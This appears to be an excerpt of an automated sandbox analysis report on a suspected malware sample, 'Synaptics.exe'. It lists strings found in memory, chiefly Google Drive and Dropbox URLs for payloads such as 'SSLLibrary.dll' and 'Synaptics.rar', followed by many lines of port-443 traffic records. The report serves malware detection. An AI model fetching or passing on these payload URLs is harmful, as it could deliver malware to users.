                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadub
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvR
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwV
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadws
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxV
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxb
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxs
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyl
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadym
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~Q
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~U
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: RCX5246.tmp.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVl;
                              Source: Synaptics.exe, 00000003.00000003.1439557060.00000000052EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.google
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4M
                              Source: Synaptics.exe, 00000003.00000002.1808081146.00000000052D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.1808081146.00000000052D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAapT
                              Source: Synaptics.exe, 00000003.00000003.1442265762.00000000052C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAapT=
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCz
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1814105855.0000000007A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgx
                              Source: Synaptics.exe, 00000003.00000003.1442265762.00000000052C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhc0
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity-Pol
                              Source: Synaptics.exe, 00000003.00000002.1814105855.0000000007A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                              Source: Synaptics.exe, 00000003.00000003.1442265762.00000000052C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: RCX5246.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: RCX5246.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: RCX5246.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
